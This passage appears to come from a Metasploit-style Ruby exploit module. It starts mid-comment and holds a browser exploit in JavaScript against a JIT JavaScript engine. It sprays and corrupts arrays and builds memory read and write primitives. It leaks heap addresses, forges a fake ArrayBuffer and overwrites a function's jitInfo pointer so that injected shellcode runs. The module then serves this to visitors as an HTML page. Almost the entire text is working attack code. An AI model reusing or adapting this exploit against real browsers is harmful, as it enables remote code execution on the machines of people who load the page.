to pop xcalc. function shellcode(){ #{shellcode_js} } // helper functions var conv_buf = new ArrayBuffer(8); var f64_buf = new Float64Array(conv_buf); var u64_buf = new Uint32Array(conv_buf); function dbl_to_bigint(val) { f64_buf[0] = val; return BigInt(u64_buf[0]) + (BigInt(u64_buf[1]) << 32n); } function bigint_to_dbl(val) { u64_buf[0] = Number(val & 0xffffffffn); u64_buf[1] = Number(val >> 32n); return f64_buf[0]; } function main() { let i = 0; // ensure the shellcode is in jit rwx memory for(i = 0;i < 0x5000; i++) shellcode(); // The jitme function returns arrays. We'll save them, just in case. let arr_saved = []; // Get the sprayed objects let arr = init(); // This is our target object. Choosing one of the end ones so that there is enough time for jitme to be compiled let interesting = arr[arr.length - 10]; // Iterate over the vulnerable object array for (i = 0; i < arr.length; i++) { // Run the jitme function across the array corr_arr = jitme(arr[i], interesting, i); // Save the generated array. Never trust the garbage collector. arr_saved[i] = corr_arr; // Find the corrupted array if(corr_arr.length != 491) { // Save it for future evil evil = corr_arr break; } } if(evil == 0) { print("Failure: Failed to get the corrupted array"); return; } print("got the corrupted array " + evil.length); TOTAL=arr.length; arg = setup_prim(arr, i+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115, 116, 117, 118, 119, 120, 121, 122, 123, 124, 125, 126, 127, 128, 129, 130, 131, 132, 133, 134, 135, 136, 137, 138, 139, 140, 141, 142, 143, 144, 145, 146, 147, 148, 149, 150, 151, 152, 153, 154, 155, 156, 157, 158, 159, 160, 161, 162, 163, 164, 165, 166, 167, 168, 169, 170, 171, 172, 173, 174, 175, 176, 177, 178, 179, 180, 181, 182, 183, 184, 185, 186, 187, 188, 189, 190, 191, 192, 193, 194, 195, 196, 197, 198, 199, 200, 201, 202, 203, 204, 205, 206, 207, 208, 209, 210, 211, 212, 213, 214, 215, 216, 217, 218, 219, 220, 221, 222, 223, 224, 225, 226, 227, 228, 229, 230, 231, 232, 233, 234, 235, 236, 237, 238, 239, 240, 241, 242, 243, 244, 245, 246, 247, 248, 249, 250, 251, 252, 253, 254, 255, 256, 257, 258, 259, 260, 261, 262, 263, 264, 265, 266, 267, 268, 269, 270, 271, 272, 273, 274, 275, 276, 277, 278, 279, 280, 281, 282, 283, 284, 285, 286, 287, 288, 289, 290, 291, 292, 293, 294, 295, 296, 297, 298, 299, 300, 301, 302, 303, 304, 305, 306, 307, 308, 309, 310, 311, 312, 313, 314, 315, 316, 317, 318, 319, 320, 321, 322, 323, 324, 325, 326, 327, 328, 329, 330, 331, 332, 333, 334, 335, 336, 337, 338, 339, 340, 341, 342, 343, 344, 345, 346, 347, 348, 349, 350, 351, 352, 353, 354, 355, 356, 357, 358, 359, 360, 361, 362, 363, 364, 365, 366, 367, 368, 369, 370, 371, 372, 373, 374, 375, 376, 377, 378, 379, 380, 381, 382, 383, 384, 385, 386, 387, 388, 389, 390, 391, 392, 393, 394, 395, 396, 397, 398, 399, 400, 401, 402, 403, 404, 405, 406, 407, 408, 409, 410, 411, 412, 413, 414, 415, 416, 417, 418, 419, 420, 421, 422, 423, 424, 425, 426, 427, 428, 429, 430, 431, 432, 433, 434, 435, 436, 437, 438, 439, 440, 441, 442, 443, 444, 445, 446, 447, 448, 449, 450, 451, 452, 453, 454, 455, 456, 457, 458, 459, 460, 461, 462, 463, 464, 465, 466, 467, 468, 469, 470, 471, 472, 473, 474, 475, 476, 477, 478, 479, 480); old_rareargdat_ptr = evil[511]; print("Leaked nursery location: " + dbl_to_bigint(old_rareargdat_ptr).toString(16)); iterator = dbl_to_bigint(old_rareargdat_ptr); // Start from this value counter = 0; // Used to prevent a while(true) situation while(counter < 0x200) { // Read the current address output = weak_read32(arg, bigint_to_dbl(iterator)); // Check if it's the expected size value for our ArgumentsObject object if(output == 0x1e10 || output == 0x1e20) { // If it is, then read the ArgumentsData pointer ad_location = weak_read64(arg, bigint_to_dbl(iterator + 8n)); // Get the pointer in ArgumentsData to RareArgumentsData ptr_in_argdat = weak_read64(arg, bigint_to_dbl(ad_location + 8n)); // ad_location + 8 points to the RareArgumentsData pointer, so this should match // We do this because after spraying arguments, there may be a few ArgumentObjects to go past if((ad_location + 8n) == ptr_in_argdat) break; } // Iterate backwards iterator = iterator - 8n; // Increment counter counter += 1; } if(counter == 0x200) { print("Failure: Failed to get AD location"); return; } print("AD location: " + ad_location.toString(16)); // The target Uint32Array - A large size value to: // - Help find the object (Not many 0x00101337 values nearby!) // - Give enough space for 0xfffff so we can fake a Nursery Cell ((ptr & 0xfffffffffff00000) | 0xfffe8 must be set to 1 to avoid crashes) target_uint32arr = new Uint32Array(0x101337); // Find the Uint32Array starting from the original leaked Nursery pointer iterator = dbl_to_bigint(old_rareargdat_ptr); counter = 0; // Use a counter while(counter < 0x5000) { // Read a memory address output = weak_read32(arg, bigint_to_dbl(iterator)); // If we have found the right size value, we have found the Uint32Array! if(output == 0x101337) break; // Check the next memory location iterator = iterator + 8n; // Increment the counter counter += 1; } if(counter == 0x5000) { print("Failure: Failed to find the Uint32Array"); return; } // Subtract from the size value address to get to the start of the Uint32Array arr_buf_addr = iterator - 40n; // Get the Array Buffer backing store arr_buf_loc = weak_read64(arg, bigint_to_dbl(iterator + 16n)); print("AB Location: " + arr_buf_loc.toString(16)); // Create a fake ArrayBuffer through cloning iterator = arr_buf_addr; for(i=0;i<64;i++) { output = weak_read32(arg, bigint_to_dbl(iterator)); target_uint32arr[i] = output; iterator = iterator + 4n; } // Cell Header - Set it to Nursery to pass isNursery() target_uint32arr[0x3fffa] = 1; // Write an unboxed pointer to arguments[0] evil[512] = bigint_to_dbl(arr_buf_loc); // Make it NaN-Boxed write_nan(arg, bigint_to_dbl(ad_location + 16n)); // Points to evil[512]/arguments[0] // From here we have a fake UintArray in arg[0] // Pointer can be changed using target_uint32arr[14] and target_uint32arr[15] fake_arrbuf = arg[0]; // Get the address of the shellcode function object shellcode_addr = addrof(arg, shellcode); print("Function is at: " + shellcode_addr.toString(16)); // Get the jitInfo pointer in the JSFunction object jitinfo = weak_read64(arg, bigint_to_dbl(shellcode_addr + 0x30n)); // JSFunction.u.native.extra.jitInfo_ print(" jitinfo: " + jitinfo.toString(16)); // We can then fetch the RX region from here rx_region = weak_read64(arg, bigint_to_dbl(jitinfo)); print(" RX Region: " + rx_region.toString(16)); iterator = rx_region; // Start from the RX region found = false // Iterate to find the 0x41414141 value in-memory. 8 bytes after this is the start of the shellcode. for(i = 0; i < 0x800; i++) { data = weak_read64(arg, bigint_to_dbl(iterator)); if(data == 0x41414141n) { iterator = iterator + 8n; found = true; break; } iterator = iterator + 8n; } if(!found) { print("Failure: Failed to find the JIT start"); return; } // We now have a pointer to the start of the shellcode shellcode_location = iterator; print("Shellcode start: " + shellcode_location.toString(16)); // And can now overwrite the previous jitInfo pointer with our shellcode pointer write(bigint_to_dbl(jitinfo), bigint_to_dbl(shellcode_location)); print("Triggering..."); shellcode(); // Triggering our shellcode is as simple as calling the function again. } main(); JS jscript = add_debug_print_js(jscript) html = %( <html> <script> #{jscript} </script> </html> ) send_response(cli, html, { 'Content-Type' => 'text/html', 'Cache-Control' => 'no-cache, no-store, must-revalidate', 'Pragma' => 'no-cache', 'Expires' => '0' }) end end </code></pre>